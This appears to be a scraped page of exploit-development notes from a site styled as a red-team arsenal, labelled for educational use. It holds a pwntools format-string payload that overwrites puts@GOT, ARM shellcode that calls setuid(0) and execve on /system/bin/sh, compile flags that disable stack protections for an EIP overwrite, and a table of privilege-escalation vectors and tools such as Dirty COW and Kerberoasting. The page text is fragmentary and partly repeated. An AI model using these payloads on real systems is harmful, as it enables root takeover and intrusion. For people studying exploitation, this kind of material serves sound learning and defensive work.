Classic Stack Overflow
Overwrite EIP on 32-bit Linux. Compile with -fno-stack-protector -z execstack
.
.-'''-. / .===. \ \/ 0 0 \/ ( _ ) The Black Box `-___-´ Red-Team Arsenal
Exploit development notes and adversary tradecraft. For educational use only.
Overwrite EIP on 32-bit Linux. Compile with -fno-stack-protector -z execstack
.
Directly overwrite .got
entries with %n. Use pwntools fmtstr_payload
.
from pwn import * addr = 0x0804a00c # puts@GOT payload = fmtstr_payload(7, {addr: 0x0804867b})
push {r7} @ setuid(0) mov r7, #0x17 mov r0, #0 svc 0 adr r0, binsh @ execve eor r1, r1, r1 push {r0, r1} mov r7, #0xb svc 0 binsh: .asciz "/system/bin/sh"
OS | Vector | Tool | Reference |
---|---|---|---|
Linux | Kernel exploit | dirtycow.c |
CVE-2016-5195 |
Linux | SUID misconfig | linpeas |
HackTricks |
Windows | Kerberoasting | Rubeus |
ADSecurity |
Windows | DLL hijack | Process Monitor |
PentestLab |
sublist.txt